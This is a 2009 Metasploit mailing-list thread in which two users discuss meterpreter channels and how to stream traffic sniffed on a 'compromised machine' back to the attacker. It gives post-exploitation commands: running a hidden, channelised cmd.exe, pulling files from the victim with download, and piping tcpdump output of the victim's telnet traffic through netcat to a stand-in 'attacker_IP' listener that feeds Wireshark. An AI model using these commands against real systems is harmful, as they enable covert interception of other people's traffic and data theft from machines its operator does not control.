[framework-hackers] Fwd: Channelized

[anastasiosm at gmail.com (Anastasios Monachos)]

2009/2/12 Bryan Richardson <btricha at gmail.com>

> Hi again Anastacios,
>
> Quick question... is there anything in the Metasploit Rex library that
> would allow me to start up a listener similar to netcat directly in
> Metasploit?  This way, I could receive the results of my remote sniffing
> directly in my program and analyze it in real time...
Not something "off the box" that I am aware of that would fit in your case.
But I guess you can code your own auxiliary module so to simply listen for
connections on a port and save any incoming data to a file(check the
existing auxiliaries capture, the Rex/socket/tcp.rb, tcp_server.rb in msf
these might help you) or relay the incoming data to another program - in a
sense it is the same as having a nc listener on your pc. Recently HD has
added the connect core command that is similar to nc but you can only
connect to a compromised host, not listen for incoming connections initiated
from your victims, if you are interesting see
http://www.metasploit.org/blog/#blog-4 .


> Also, I've figured out how to access the channel created for an executed
> process.
meterpreter > interact channel_id


> Do you know of any way I could pipe output from a command I execute on the
> compromised machine to the channel?
If it is a usual command like a nmap sweep to the whole victim's network,
through that compromised machine you can either interact with the channel,
or use the channel read command available in meterpreter.


> For example, if I run tcpdump on the compromised host, I can read the
> output of the command via the channel.
Correct, during your interaction with the channel.


> However, this output is not in pcap format.  In order to get it in pcap
> format, I have to use the '-w' option to write it to a file in pcap format.
> I can tell '-w' to write the data in pcap format to stdin using '-' as the
> value for '-w', then pipe stdin to something like netcat.
> In turn, I'd like to be able to either pipe the data to the channel
Your sniffer most likely will not output the raw(pcap formatted) captured
data on stdout, and if we suppose it does let you do that, there will be
lots of gibberish on your screen (you would see the same ugly output as
trying to cat a pcap file), so we can conclude that you do need to save the
captures in files of pcap format and then somehow transmit them over the
attacker's pc for analysis/import to your data viewer.

, or pipe it to netcat and hopefully use something in the Rex library to
> receive the pcap data...
If you pipe the pcap file to nc you will need a nc listener on the other end
(attacker's pc) as you already know. Additionally, you can interact with the
channel and use the download command to get the files

> What do you think?
Hope I didnt miss the points and didnt confuse you.
Any other readers on the list please add your valuable comments

--
> Thanks!
> Bryan
>
> 2009/2/9 Anastasios Monachos <anastasiosm at gmail.com>
>
> > 2009/2/9 Bryan Richardson <btricha at gmail.com>
> >
> > > Thanks Anastasios,
> > >
> > > So, am I correct in assuming this is how one is dumped into a Windows
> > > shell after executing an exploit on a vulnerable Windows machine?
> >
> > Bryan, if I am following you correctly, yes, using the download command
> > supplied by meterpreter payload you can get a file from victim's machine to
> > your machine. Note that in the case of windows you will have to escape the \
> > with an extra \ when(if) specifying the full path of the file's source and
> > destination, obviously if you do "download file.txt file.txt" it will try to
> > get the file from victim's current directory and save it to your current
> > directory.
> >
> >
> > > I was hoping that I could 'channelize' a traffic sniffer such that the
> > > sniffed traffic would be sent back to me in real time for real time
> > > analysis... it doesn't seem like this is the case.
> >
> > I agree, real-time traffic in some environments really helps the whole
> > task
> >
> > Ultimately, what would be cool is to have my real-time traffic analysis
> > > software listening on a particular port and have some way of sending the
> > > sniffed traffic from the compromised machine to that particular port on my
> > > local machine.
> >
> > I think it worths trying piping your live data through nc as we do with
> > dd, but I am not sure if it will work in your case, oh you will have to let
> > your nc traffic pass the firewall.
> >
> > For example:
> > On victim you can try something like: tcpdump -e host victim_ip and port
> > 23 | nc attacker_IP attacker_listening_port
> > On attacker: nc -l -p attacker_listening_port | wireshark -i -
> >      Taken from wireshark's man
> >            " .... Pipe names should be either the name of a FIFO (named
> > pipe) or
> >            ''-'' to read data from the standard input.  Data read from
> > pipes
> >            must be in standard libpcap format...."
> >
> > Last you may also play with the channel read/write options, so to pass
> > nc's traffic through the channel (?), maybe someone else can reach more
> > light here
> >
> > Let us know what worked and what didnt anyway
> >
> > Tasos
> >
> >
> > > --
> > > Bryan
> > >
> > >  On Mon, Feb 9, 2009 at 2:26 PM, Anastasios Monachos <
> > > anastasiosm at gmail.com> wrote:
> > >
> > > > 2009/2/9 Bryan Richardson <btricha at gmail.com>
> > > >
> > > > Hello All,
> > > > > Would someone mind explaining to me what 'channelized' is and how it
> > > > > works?
> > > >
> > > > You can use "channelisation" in cases where you wish to work with
> > > > multiple communication channels that will be tunnelled through one tcp/ip
> > > > session.
> > > >
> > > > Channels are supported by the meterpreter payload, and to channelise you
> > > > can do:
> > > >
> > > > meterpreter > execute -f cmd.exe -H -c //this will execute the file
> > > > cmd.exe, it will hide the process window and it will channelise the task
> > > >
> > > > Process 1234 created.  //this is output from meterpreter
> > > >
> > > > Channel 2 created.//this is output from meterpreter
> > > >
> > > > meterpreter > //now use meterpreter as usual to do your other stuff
> > > >
> > > > meterpreter > interact 2 //now interact with channelised cmd.exe
> > > >
> > > >
> > > > > I'm wanting to try and use it to send sniffed traffic back to me from a
> > > > > compromised machine that I upload a traffic sniffer to...
> > > >
> > > > For already saved captured data you could use the upload/download
> > > > commands (again from within meterpreter)
> > > >
> > > > > --
> > > > > Thanks!
> > > > > Bryan
> > > > >
> > > > > _______________________________________________
> > > > > Framework-Hackers mailing list
> > > > > Framework-Hackers at spool.metasploit.com
> > > > > http://spool.metasploit.com/mailman/listinfo/framework-hackers
> > > >
> > > > --
> > > > AM
> >
> >
> > --
> > AM
> > _______________________________________________
> > Framework-Hackers mailing list
> > Framework-Hackers at spool.metasploit.com
> > http://spool.metasploit.com/mailman/listinfo/framework-hackers
>
>
> _______________________________________________
> Framework-Hackers mailing list
> Framework-Hackers at spool.metasploit.com
> http://spool.metasploit.com/mailman/listinfo/framework-hackers


-- 
AM
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090213/50f534c5/attachment.htm>